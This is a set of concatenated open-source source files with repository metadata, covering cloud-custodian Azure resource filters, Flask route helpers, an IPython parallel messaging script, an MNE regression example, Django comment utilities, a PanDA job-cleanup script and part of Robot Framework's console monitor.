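# that TagActionFilter expects looks like "<message>: <op>@<date>". The
# parsing below mirrors __call__ above.
def _example_parse_marked_for_op_tag(value="VM marked for stop: stop@2019/07/01"):
    msg, tgt = value.rsplit(':', 1)
    action, action_date_str = tgt.strip().split('@', 1)
    return action, action_date_str  # ('stop', '2019/07/01')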
class DiagnosticSettingsFilter(ValueFilter):
"""The diagnostic settings filter is implicitly just the ValueFilter
on the diagnostic settings for an azure resource.
:example:
Find Load Balancers that have logs for both LoadBalancerProbeHealthStatus category and
LoadBalancerAlertEvent category enabled.
    The use of value_type: swap is important for these examples because it
    swaps the value and the evaluated key, so that the filter checks that the
    provided value appears in the logs.
.. code-block:: yaml
        policies:
- name: find-load-balancers-with-logs-enabled
resource: azure.loadbalancer
filters:
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerProbeHealthStatus'][].enabled
value: True
op: in
value_type: swap
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerAlertEvent'][].enabled
value: True
op: in
value_type: swap
:example:
Find KeyVaults that have logs enabled for the AuditEvent category.
.. code-block:: yaml
        policies:
- name: find-keyvaults-with-logs-enabled
resource: azure.keyvault
filters:
- type: diagnostic-settings
key: logs[?category == 'AuditEvent'][].enabled
value: True
op: in
value_type: swap
"""
schema = type_schema('diagnostic-settings', rinherit=ValueFilter.schema)
schema_alias = True
log = logging.getLogger('custodian.azure.filters.DiagnosticSettingsFilter')
def process(self, resources, event=None):
futures = []
results = []
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
for resource_set in chunks(resources, 20):
futures.append(w.submit(self.process_resource_set, resource_set))
for f in as_completed(futures):
if f.exception():
self.log.warning(
"Diagnostic settings filter error: %s" % f.exception())
continue
else:
results.extend(f.result())
return results
def process_resource_set(self, resources):
#: :type: azure.mgmt.monitor.MonitorManagementClient
client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
matched = []
for resource in resources:
settings = client.diagnostic_settings.list(resource['id'])
settings = [s.as_dict() for s in settings.value]
filtered_settings = super(DiagnosticSettingsFilter, self).process(settings, event=None)
if filtered_settings:
matched.append(resource)
return matched
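# Illustrative sketch (hypothetical payload; uses the jmespath package that
# c7n's ValueFilter relies on): what the docstring examples above evaluate.
# With value_type: swap the provided value (True) is tested for membership in
# the list produced by the JMESPath key.
def _example_diagnostic_settings_key():
    import jmespath
    setting = {'logs': [{'category': 'AuditEvent', 'enabled': True},
                        {'category': 'OtherEvents', 'enabled': False}]}
    enabled_flags = jmespath.search(
        "logs[?category == 'AuditEvent'][].enabled", setting)
    return True in enabled_flags  # True -> the resource matches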
class PolicyCompliantFilter(Filter):
"""Filter resources based on Azure Policy compliance status
Filter resources by their current Azure Policy compliance status.
You can specify if you want to filter compliant or non-compliant resources.
    You can provide a list of Azure Policy definition display names or names
    to limit the set of non-compliant resources. By default it returns all
    non-compliant resources.
.. code-block :: yaml
policies:
- name: non-compliant-vms
resource: azure.vm
filters:
- type: policy-compliant
compliant: false
definitions:
- "Definition display name 1"
- "Definition display name 2"
"""
schema = type_schema('policy-compliant', required=['type', 'compliant'],
compliant={'type': 'boolean'},
definitions={'type': 'array'})
schema_alias = True
def __init__(self, data, manager=None):
super(PolicyCompliantFilter, self).__init__(data, manager)
self.compliant = self.data['compliant']
self.definitions = self.data.get('definitions')
def process(self, resources, event=None):
s = self.manager.get_session()
definition_ids = None
# Translate definitions display names into ids
if self.definitions:
policyClient = s.client("azure.mgmt.resource.policy.PolicyClient")
definitions = [d for d in policyClient.policy_definitions.list()]
definition_ids = [d.id.lower() for d in definitions
if d.display_name in self.definitions or
d.name in self.definitions]
# Find non-compliant resources
client = PolicyInsightsClient(s.get_credentials())
query = client.policy_states.list_query_results_for_subscription(
policy_states_resource='latest', subscription_id=s.subscription_id).value
non_compliant = [f.resource_id.lower() for f in query
if not definition_ids or f.policy_definition_id.lower() in definition_ids]
if self.compliant:
return [r for r in resources if r['id'].lower() not in non_compliant]
else:
return [r for r in resources if r['id'].lower() in non_compliant]
class AzureOffHour(OffHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
class AzureOnHour(OnHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
@six.add_metaclass(ABCMeta)
class FirewallRulesFilter(Filter):
"""Filters resources by the firewall rules
Rules can be specified as x.x.x.x-y.y.y.y or x.x.x.x or x.x.x.x/y.
With the exception of **equal** all modes reference total IP space and ignore
specific notation.
**include**: True if all IP space listed is included in firewall.
**any**: True if any overlap in IP space exists.
**only**: True if firewall IP space only includes IPs from provided space
(firewall is subset of provided space).
**equal**: the list of IP ranges or CIDR that firewall rules must match exactly.
**IMPORTANT**: this filter ignores all bypass rules. If you want to ensure your resource is
not available for other Azure Cloud services or from the Portal, please use ``firewall-bypass``
filter.
:example:
.. code-block:: yaml
policies:
- name: servers-with-firewall
resource: azure.sqlserver
filters:
- type: firewall-rules
include:
- '131.107.160.2-131.107.160.3'
- 10.20.20.0/24
"""
schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'type': {'enum': ['firewall-rules']},
'include': {'type': 'array', 'items': {'type': 'string'}},
'any': {'type': 'array', 'items': {'type': 'string'}},
'only': {'type': 'array', 'items': {'type': 'string'}},
'equal': {'type': 'array', 'items': {'type': 'string'}}
},
'oneOf': [
{"required": ["type", "include"]},
{"required": ["type", "any"]},
{"required": ["type", "only"]},
{"required": ["type", "equal"]}
]
}
schema_alias = True
log = logging.getLogger('custodian.azure.filters.FirewallRulesFilter')
def __init__(self, data, manager=None):
super(FirewallRulesFilter, self).__init__(data, manager)
self.policy_include = None
self.policy_equal = None
self.policy_any = None
self.policy_only = None
self.client = None
def process(self, resources, event=None):
self.policy_include = IpRangeHelper.parse_ip_ranges(self.data, 'include')
self.policy_equal = IpRangeHelper.parse_ip_ranges(self.data, 'equal')
self.policy_any = IpRangeHelper.parse_ip_ranges(self.data, 'any')
self.policy_only = IpRangeHelper.parse_ip_ranges(self.data, 'only')
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_rules(self, resource):
"""
Queries firewall rules for a resource. Override in concrete classes.
:param resource:
        :return: A netaddr.IPSet of the rules defined for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
resource_rules = self._query_rules(resource)
ok = self._check_rules(resource_rules)
return ok
def _check_rules(self, resource_rules):
if self.policy_equal is not None:
return self.policy_equal == resource_rules
elif self.policy_include is not None:
return self.policy_include.issubset(resource_rules)
elif self.policy_any is not None:
return not self.policy_any.isdisjoint(resource_rules)
elif self.policy_only is not None:
return resource_rules.issubset(self.policy_only)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
@six.add_metaclass(ABCMeta)
class FirewallBypassFilter(Filter):
"""Filters resources by the firewall bypass rules
"""
@staticmethod
def schema(values):
return type_schema(
'firewall-bypass',
required=['mode', 'list'],
**{
'mode': {'enum': ['include', 'equal', 'any', 'only']},
'list': {'type': 'array', 'items': {'enum': values}}
})
    log = logging.getLogger('custodian.azure.filters.FirewallBypassFilter')
def __init__(self, data, manager=None):
super(FirewallBypassFilter, self).__init__(data, manager)
self.mode = self.data['mode']
self.list = set(self.data['list'])
self.client = None
def process(self, resources, event=None):
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_bypass(self, resource):
"""
        Queries the firewall bypass settings for a resource. Override in
        concrete classes.
        :param resource:
        :return: A list of bypass option names enabled for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
bypass_set = set(self._query_bypass(resource))
ok = self._check_bypass(bypass_set)
return ok
def _check_bypass(self, bypass_set):
if self.mode == 'equal':
return self.list == bypass_set
elif self.mode == 'include':
return self.list.issubset(bypass_set)
elif self.mode == 'any':
return not self.list.isdisjoint(bypass_set)
elif self.mode == 'only':
return bypass_set.issubset(self.list)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
class ResourceLockFilter(Filter):
"""
Filter locked resources.
    A lock can be one of two types: ReadOnly or CanNotDelete. To match either,
    use the "Any" type. Lock type is optional; by default the filter matches
    any lock type.
To get unlocked resources, use "Absent" type.
:example:
Get all keyvaults with ReadOnly lock:
.. code-block :: yaml
policies:
- name: locked-keyvaults
resource: azure.keyvault
filters:
- type: resource-lock
lock-type: ReadOnly
:example:
Get all locked sqldatabases (any type of lock):
.. code-block :: yaml
policies:
- name: locked-sqldatabases
resource: azure.sqldatabase
filters:
- type: resource-lock
:example:
Get all unlocked resource groups:
.. code-block :: yaml
policies:
- name: unlock-rgs
resource: azure.resourcegroup
filters:
- type: resource-lock
lock-type: Absent
"""
schema = type_schema(
'resource-lock', required=['type'],
**{
'lock-type': {'enum': ['ReadOnly', 'CanNotDelete', 'Any', 'Absent']},
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.ResourceLockFilter')
def __init__(self, data, manager=None):
super(ResourceLockFilter, self).__init__(data, manager)
self.lock_type = self.data.get('lock-type', 'Any')
def process(self, resources, event=None):
resources, exceptions = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._process_resource_set,
executor_factory=self.executor_factory,
log=self.log
)
if exceptions:
raise exceptions[0]
return resources
def _process_resource_set(self, resources, event=None):
client = self.manager.get_client('azure.mgmt.resource.locks.ManagementLockClient')
result = []
for resource in resources:
if is_resource_group(resource):
locks = [r.serialize(True) for r in
client.management_locks.list_at_resource_group_level(
resource['name'])]
else:
locks = [r.serialize(True) for r in client.management_locks.list_at_resource_level(
resource['resourceGroup'],
ResourceIdParser.get_namespace(resource['id']),
ResourceIdParser.get_resource_name(resource.get('c7n:parent-id')) or '',
ResourceIdParser.get_resource_type(resource['id']),
resource['name'])]
if StringUtils.equal('Absent', self.lock_type) and not locks:
result.append(resource)
else:
for lock in locks:
if StringUtils.equal('Any', self.lock_type) or \
StringUtils.equal(lock['properties']['level'], self.lock_type):
result.append(resource)
break
return result
class CostFilter(ValueFilter):
"""
Filter resources by the cost consumed over a timeframe.
    The total cost for a resource includes the costs for all of its child
    resources if they are billed separately (e.g. SQL Server and SQL Server
    Databases). A warning is logged if different currencies are detected.
Timeframe options:
- Number of days before today
- All days in current calendar period until today:
- ``WeekToDate``
- ``MonthToDate``
- ``YearToDate``
- All days in the previous calendar period:
- ``TheLastWeek``
- ``TheLastMonth``
- ``TheLastYear``
:examples:
    SQL servers that cost more than 2000 in the last month.
.. code-block:: yaml
policies:
- name: expensive-sql-servers-last-month
resource: azure.sqlserver
filters:
- type: cost
timeframe: TheLastMonth
op: gt
value: 2000
    SQL servers that cost more than 2000 in the last 30 days, not including today.
.. code-block:: yaml
policies:
- name: expensive-sql-servers
resource: azure.sqlserver
filters:
- type: cost
timeframe: 30
op: gt
value: 2000
"""
preset_timeframes = [i.value for i in TimeframeType if i.value != 'Custom']
schema = type_schema('cost',
rinherit=ValueFilter.schema,
required=['timeframe'],
key=None,
**{
'timeframe': {
'oneOf': [
{'enum': preset_timeframes},
{"type": "number", "minimum": 1}
]
}
})
schema_alias = True
log = logging.getLogger('custodian.azure.filters.CostFilter')
def __init__(self, data, manager=None):
data['key'] = 'PreTaxCost' # can also be Currency, but now only PreTaxCost is supported
super(CostFilter, self).__init__(data, manager)
self.cached_costs = None
def __call__(self, i):
if not self.cached_costs:
self.cached_costs = self._query_costs()
id = i['id'].lower() + "/"
costs = [k.copy() for k in self.cached_costs if (k['ResourceId'] + '/').startswith(id)]
if not costs:
return False
if any(c['Currency'] != costs[0]['Currency'] for c in costs):
self.log.warning('Detected different currencies for the resource {0}. Costs array: {1}'
.format(i['id'], costs))
total_cost = {
'PreTaxCost': sum(c['PreTaxCost'] for c in costs),
'Currency': costs[0]['Currency']
}
i[get_annotation_prefix('cost')] = total_cost
result = super(CostFilter, self).__call__(total_cost)
return result
def fix_wrap_rest_response(self, data):
"""
        The Azure REST API doesn't match the documentation and the Python SDK
        fails to deserialize the response.
        This is a temporary workaround that converts the response into the
        correct form.
        :param data: partially deserialized response that doesn't match the spec.
        :return: partially deserialized response that does match the spec.
"""
type = data.get('type', None)
if type != 'Microsoft.CostManagement/query':
return data
data['value'] = [data]
data['nextLink'] = data['properties']['nextLink']
return data
def _query_costs(self):
manager = self.manager
is_resource_group = manager.type == 'resourcegroup'
client = manager.get_client('azure.mgmt.costmanagement.CostManagementClient')
aggregation = {'totalCost': QueryAggregation(name='PreTaxCost')}
grouping = [QueryGrouping(type='Dimension',
name='ResourceGroupName' if is_resource_group else 'ResourceId')]
query_filter = None
if not is_resource_group:
query_filter = QueryFilter(
dimension=QueryComparisonExpression(name='ResourceType',
operator='In',
values=[manager.resource_type.resource_type]))
if 'dimension' in query_filter._attribute_map:
query_filter._attribute_map['dimension']['key'] = 'dimensions'
dataset = QueryDataset(grouping=grouping, aggregation=aggregation, filter=query_filter)
timeframe = self.data['timeframe']
time_period = None
if timeframe not in CostFilter.preset_timeframes:
end_time = utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
start_time = end_time - timedelta(days=timeframe)
timeframe = 'Custom'
time_period = QueryTimePeriod(from_property=start_time, to=end_time)
definition = QueryDefinition(timeframe=timeframe, time_period=time_period, dataset=dataset)
subscription_id = manager.get_session().get_subscription_id()
scope = '/subscriptions/' + subscription_id
query = client.query.usage_by_scope(scope, definition)
if hasattr(query, '_derserializer'):
original = query._derserializer._deserialize
query._derserializer._deserialize = lambda target, data: \
original(target, self.fix_wrap_rest_response(data))
result_list = list(query)[0]
result_list = [{result_list.columns[i].name: v for i, v in enumerate(row)}
for row in result_list.rows]
for r in result_list:
if 'ResourceGroupName' in r:
r['ResourceId'] = scope + '/resourcegroups/' + r.pop('ResourceGroupName')
r['ResourceId'] = r['ResourceId'].lower()
return result_list
class ParentFilter(Filter):
"""
Meta filter that allows you to filter child resources by applying filters to their
parent resources.
You can use any filter supported by the corresponding parent resource type.
:examples:
Find Azure KeyVault Keys from Key Vaults with ``owner:ProjectA`` tag.
.. code-block:: yaml
policies:
- name: kv-keys-from-tagged-keyvaults
resource: azure.keyvault-key
filters:
- type: parent
filter:
type: value
key: tags.owner
value: ProjectA
"""
schema = type_schema(
'parent', filter={'type': 'object'}, required=['type'])
schema_alias = True
def __init__(self, data, manager=None):
super(ParentFilter, self).__init__(data, manager)
self.parent_manager = self.manager.get_parent_manager()
self.parent_filter = self.parent_manager.filter_registry.factory(
self.data['filter'],
self.parent_manager)
def process(self, resources, event=None):
parent_resources = self.parent_filter.process(self.parent_manager.resources())
parent_resources_ids = [p['id'] for p in parent_resources]
parent_key = self.manager.resource_type.parent_key
return [r for r in resources if r[parent_key] in parent_resources_ids]
| {
"content_hash": "608b43f6f0e3abaaf25d9ded598d2eb6",
"timestamp": "",
"source": "github",
"line_count": 1011,
"max_line_length": 103,
"avg_line_length": 34.44015825914936,
"alnum_prop": 0.582268301789253,
"repo_name": "Sutto/cloud-custodian",
"id": "ac25259cd7340f2f8478a12b051fd056fee988ad",
"size": "35409",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/c7n_azure/c7n_azure/filters.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7986"
},
{
"name": "Go",
"bytes": "146630"
},
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "9971"
},
{
"name": "PowerShell",
"bytes": "1804"
},
{
"name": "Python",
"bytes": "5283859"
},
{
"name": "Shell",
"bytes": "12627"
},
{
"name": "Smarty",
"bytes": "359"
}
],
"symlink_target": ""
} |
import logging
import logging.handlers
import logging.config
#from maboss import config
log = logging.getLogger(__name__)
from .lazy_view import LazyView
#function view
def url(app, url_rule, import_name, **options):
view = LazyView('maboss.' + import_name)
app.add_url_rule(url_rule, view_func=view, **options)
#restful function view
def register_rest(app, url_base, import_name, pk='id', pk_type='int'):
log.debug("=="*20)
log.debug(import_name)
#get
url_rule = url_base
view = LazyView('maboss.' + import_name+'.get')
log.debug(view)
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'GET',])
#post
url_rule = url_base
view = LazyView('maboss.' + import_name+'.post')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'POST'])
#get
url_rule ='%s<%s:%s>' % (url_base, pk_type, pk)
view = LazyView('maboss.' + import_name+'.get')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'GET',])
#put
url_rule = '%s<%s:%s>' % (url_base, pk_type, pk)
view = LazyView('maboss.' + import_name+'.put')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'PUT'])
#delete
url_rule ='%s<%s:%s>' % (url_base, pk_type, pk)
view = LazyView('maboss.' + import_name+'.delete')
app.add_url_rule(url_rule, view_func=view, methods = ['OPTIONS', 'DELETE'])
#class view
def register_api(app, view, endpoint, url, pk='id', pk_type='int'):
view_func = view.as_view(endpoint)
app.add_url_rule(url, defaults={pk: None}, view_func=view_func, methods=['GET',])
app.add_url_rule(url, view_func=view_func, methods=['POST',])
app.add_url_rule('%s<%s:%s>' % (url, pk_type, pk), view_func=view_func, methods=['GET', 'PUT', 'DELETE'])
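# Illustrative usage sketch (not part of the original module); the URL prefixes,
# view module paths and the ItemAPI class below are hypothetical.
#   url(app, '/about', 'views.pages.about')
#   register_rest(app, '/api/items/', 'views.api.items')
#       -> GET/POST on /api/items/, GET/PUT/DELETE on /api/items/<int:id>
#   register_api(app, ItemAPI, 'item_api', '/api/items2/')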
| {
"content_hash": "07f58a9933aa88e39b778a26a63671e4",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 109,
"avg_line_length": 30.716666666666665,
"alnum_prop": 0.6044492674986435,
"repo_name": "mabotech/maboss.py",
"id": "7cad9d40128644d7121cd1fe8cb8cf3eae6a1709",
"size": "1843",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "maboss/webx/helpers/register.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "14864"
},
{
"name": "JavaScript",
"bytes": "4950"
},
{
"name": "Lua",
"bytes": "683"
},
{
"name": "Python",
"bytes": "433923"
},
{
"name": "Shell",
"bytes": "667"
}
],
"symlink_target": ""
} |
import sys
from IPython.parallel import Client
rc = Client()
rc.block=True
view = rc[:]
view.run('communicator.py')
view.execute('com = EngineCommunicator()')
# gather the connection information into a dict
ar = view.apply_async(lambda : com.info)
peers = ar.get_dict()
# this is a dict, keyed by engine ID, of the connection info for the EngineCommunicators
# connect the engines to each other:
view.apply_sync(lambda pdict: com.connect(pdict), peers)
# now all the engines are connected, and we can communicate between them:
def broadcast(client, sender, msg_name, dest_name=None, block=None):
"""broadcast a message from one engine to all others."""
dest_name = msg_name if dest_name is None else dest_name
client[sender].execute('com.publish(%s)'%msg_name, block=None)
targets = client.ids
targets.remove(sender)
return client[targets].execute('%s=com.consume()'%dest_name, block=None)
def send(client, sender, targets, msg_name, dest_name=None, block=None):
"""send a message from one to one-or-more engines."""
dest_name = msg_name if dest_name is None else dest_name
def _send(targets, m_name):
msg = globals()[m_name]
return com.send(targets, msg)
client[sender].apply_async(_send, targets, msg_name)
return client[targets].execute('%s=com.recv()'%dest_name, block=None)
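# Illustrative usage sketch (not part of the original script); the engine ids and
# the message name 'msg' are hypothetical (the name must exist on the sending engine).
#   broadcast(rc, 0, 'msg')        # engine 0 publishes, every other engine consumes into 'msg'
#   send(rc, 0, [1, 2], 'msg')     # engine 0 sends 'msg' to engines 1 and 2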
| {
"content_hash": "da6e9e953e77d7d24549bcc26b37b6b3",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 88,
"avg_line_length": 31.74418604651163,
"alnum_prop": 0.6981684981684981,
"repo_name": "OSGeo-live/CesiumWidget",
"id": "865c80230e184282d0c24b284956406b193bdd78",
"size": "1365",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "GSOC/notebooks/ipython/examples/Parallel Computing/interengine/interengine.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1268717"
},
{
"name": "Erlang",
"bytes": "4368"
},
{
"name": "GLSL",
"bytes": "318955"
},
{
"name": "HTML",
"bytes": "2739012"
},
{
"name": "JavaScript",
"bytes": "65112753"
},
{
"name": "Jupyter Notebook",
"bytes": "6255280"
},
{
"name": "Python",
"bytes": "308164"
},
{
"name": "Shell",
"bytes": "6212"
},
{
"name": "Smarty",
"bytes": "457"
}
],
"symlink_target": ""
} |
"""
========================================
Regression on continuous data (rER[P/F])
========================================
This demonstrates how rER[P/F]s (regressing the continuous data) are a
generalisation of traditional averaging. If all preprocessing steps
are the same, no overlap between epochs exists, and if all
predictors are binary, regression is virtually identical to traditional
averaging.
If overlap exists and/or predictors are continuous, traditional averaging
is inapplicable, but regression can estimate effects, including those of
continuous predictors.
rERPs are described in:
Smith, N. J., & Kutas, M. (2015). Regression-based estimation of ERP
waveforms: II. Non-linear effects, overlap correction, and practical
considerations. Psychophysiology, 52(2), 169-189.
"""
# Authors: Jona Sassenhagen <[email protected]>
#
# License: BSD (3-clause)
import matplotlib.pyplot as plt
import mne
from mne.datasets import sample
from mne.stats.regression import linear_regression_raw
# Load and preprocess data
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
raw = mne.io.read_raw_fif(raw_fname, preload=True).pick_types(
meg='grad', stim=True, eeg=False).filter(1, None) # high-pass
# Set up events
events = mne.find_events(raw)
event_id = {'Aud/L': 1, 'Aud/R': 2}
tmin, tmax = -.1, .5
# regular epoching
picks = mne.pick_types(raw.info, meg=True)
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, reject=None,
baseline=None, preload=True, verbose=False)
# rERF
evokeds = linear_regression_raw(raw, events=events, event_id=event_id,
reject=None, tmin=tmin, tmax=tmax)
# linear_regression_raw returns a dict of evokeds
# select conditions similarly to mne.Epochs objects
# plot both results, and their difference
cond = "Aud/L"
fig, (ax1, ax2, ax3) = plt.subplots(3, 1)
params = dict(spatial_colors=True, show=False, ylim=dict(grad=(-200, 200)))
epochs[cond].average().plot(axes=ax1, **params)
evokeds[cond].plot(axes=ax2, **params)
contrast = mne.combine_evoked([evokeds[cond], -epochs[cond].average()],
weights='equal')
contrast.plot(axes=ax3, **params)
ax1.set_title("Traditional averaging")
ax2.set_title("rERF")
ax3.set_title("Difference")
plt.show()
| {
"content_hash": "d28e460f15b0aafb47b9d3551a29431a",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 75,
"avg_line_length": 36.484375,
"alnum_prop": 0.6946466809421842,
"repo_name": "mne-tools/mne-tools.github.io",
"id": "ec3398ad205709cf368b2c939724265f4977c1b8",
"size": "2335",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "0.14/_downloads/plot_linear_regression_raw.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "708696"
},
{
"name": "Dockerfile",
"bytes": "1820"
},
{
"name": "HTML",
"bytes": "1526247783"
},
{
"name": "JavaScript",
"bytes": "1323087"
},
{
"name": "Jupyter Notebook",
"bytes": "24820047"
},
{
"name": "Python",
"bytes": "18575494"
}
],
"symlink_target": ""
} |
"""
A few helper functions for comment views.
"""
import textwrap
try:
from urllib.parse import urlencode
except ImportError: # Python 2
from urllib import urlencode
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, resolve_url
from django.template import RequestContext
from django.core.exceptions import ObjectDoesNotExist
from django.contrib import comments
from django.utils.http import is_safe_url
def next_redirect(request, fallback, **get_kwargs):
"""
Handle the "where should I go next?" part of comment views.
The next value could be a
``?next=...`` GET arg or the URL of a given view (``fallback``). See
the view modules for examples.
Returns an ``HttpResponseRedirect``.
"""
next = request.POST.get('next')
if not is_safe_url(url=next, host=request.get_host()):
next = resolve_url(fallback)
if get_kwargs:
if '#' in next:
tmp = next.rsplit('#', 1)
next = tmp[0]
anchor = '#' + tmp[1]
else:
anchor = ''
joiner = '&' if '?' in next else '?'
next += joiner + urlencode(get_kwargs) + anchor
return HttpResponseRedirect(next)
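# Illustrative sketch (not part of the original module): a posting view could hand
# control back with an extra query arg (the comment object here is hypothetical):
#   return next_redirect(request, fallback='comments-comment-done', c=comment.pk)
# which redirects to request.POST['next'] (or the fallback URL) with '?c=<pk>' appended.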
def confirmation_view(template, doc="Display a confirmation view."):
"""
Confirmation view generator for the "comment was
posted/flagged/deleted/approved" views.
"""
def confirmed(request):
comment = None
if 'c' in request.GET:
try:
comment = comments.get_model().objects.get(pk=request.GET['c'])
except (ObjectDoesNotExist, ValueError):
pass
return render_to_response(template,
{'comment': comment},
context_instance=RequestContext(request)
)
confirmed.__doc__ = textwrap.dedent("""\
%s
Templates: :template:`%s`
Context:
comment
The posted comment
""" % (doc, template)
)
return confirmed
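# Illustrative sketch (not part of the original module); the template path and doc
# string below are hypothetical:
#   comment_done = confirmation_view(template='comments/posted.html',
#                                    doc='Display a "comment was posted" success page.')
# The generated view looks up ?c=<pk> and renders the template with that comment.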
| {
"content_hash": "16d23bc3fe7da25ae5ff32a05ed05077",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 79,
"avg_line_length": 29.057142857142857,
"alnum_prop": 0.6116027531956736,
"repo_name": "mdj2/django",
"id": "da70272282ec403492dabf50d81b4cd6d801aaa3",
"size": "2034",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "django/contrib/comments/views/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "50948"
},
{
"name": "JavaScript",
"bytes": "98169"
},
{
"name": "Python",
"bytes": "8406598"
},
{
"name": "Shell",
"bytes": "12135"
}
],
"symlink_target": ""
} |
import datetime
from taskbuffer.DBProxy import DBProxy
import userinterface.Client as Client
# password
from config import panda_config
passwd = panda_config.dbpasswd
# time limit
timeLimit = datetime.datetime.utcnow() - datetime.timedelta(days=1)
# instantiate DB proxies
proxyS = DBProxy()
proxyS.connect('adbpro.usatlas.bnl.gov',passwd,'panda-developer','PandaDevDB')
# get PandaIDs from jobsDefined
res = proxyS.querySQL("SELECT PandaID,modificationTime from jobsDefined4 ORDER BY modificationTime")
# kill jobs older than the time limit
jobs=[]
for (id,modTime) in res:
if modTime < timeLimit:
jobs.append(id)
Client.killJobs(jobs)
| {
"content_hash": "6f9f3b3db2cdb6ac6b1abcd897a07914",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 100,
"avg_line_length": 24.26923076923077,
"alnum_prop": 0.7702060221870047,
"repo_name": "RRCKI/panda-server",
"id": "a646ea2028a7c7c62cdf538ac36b24981f435d6d",
"size": "631",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pandaserver/test/killDefJobs.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "PLSQL",
"bytes": "23194"
},
{
"name": "Python",
"bytes": "2670522"
},
{
"name": "Shell",
"bytes": "16124"
}
],
"symlink_target": ""
} |
import os
WATARU_BASE_DIR_PATH = os.path.abspath(os.path.dirname(__file__))
| {
"content_hash": "a0c35308ac480471185812a39f2aad2b",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 65,
"avg_line_length": 25.666666666666668,
"alnum_prop": 0.7142857142857143,
"repo_name": "risuoku/wataru",
"id": "cafc26777458f817863759d2ad2e4a9d0c158541",
"size": "77",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wataru/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "58649"
},
{
"name": "Shell",
"bytes": "216"
},
{
"name": "Smarty",
"bytes": "1910"
}
],
"symlink_target": ""
} |
import sys
from robot import utils
from .highlighting import AnsiHighlighter, Highlighter, NoHighlighting
from .loggerhelper import IsLogged
class CommandLineMonitor(object):
def __init__(self, width=78, colors='AUTO', markers='AUTO', stdout=None,
stderr=None):
self._writer = CommandLineWriter(width, colors, markers, stdout, stderr)
self._is_logged = IsLogged('WARN')
self._started = False
self._started_keywords = 0
self._running_test = False
def start_suite(self, suite):
if not self._started:
self._writer.suite_separator()
self._started = True
self._writer.info(suite.longname, suite.doc, start_suite=True)
self._writer.suite_separator()
def end_suite(self, suite):
self._writer.info(suite.longname, suite.doc)
self._writer.status(suite.status)
self._writer.message(suite.get_full_message())
self._writer.suite_separator()
def start_test(self, test):
self._writer.info(test.name, test.doc)
self._running_test = True
def end_test(self, test):
self._writer.status(test.status, clear=True)
self._writer.message(test.message)
self._writer.test_separator()
self._running_test = False
def start_keyword(self, kw):
self._started_keywords += 1
def end_keyword(self, kw):
self._started_keywords -= 1
if self._running_test and not self._started_keywords:
self._writer.keyword_marker(kw)
def message(self, msg):
if self._is_logged(msg.level):
self._writer.error(msg.message, msg.level, clear=self._running_test)
def output_file(self, name, path):
self._writer.output(name, path)
class CommandLineWriter(object):
_status_length = len('| PASS |')
def __init__(self, width=78, colors='AUTO', markers='AUTO', stdout=None,
stderr=None):
self._width = width
self._stdout = stdout or sys.__stdout__
self._stderr = stderr or sys.__stderr__
self._highlighter = StatusHighlighter(colors, self._stdout, self._stderr)
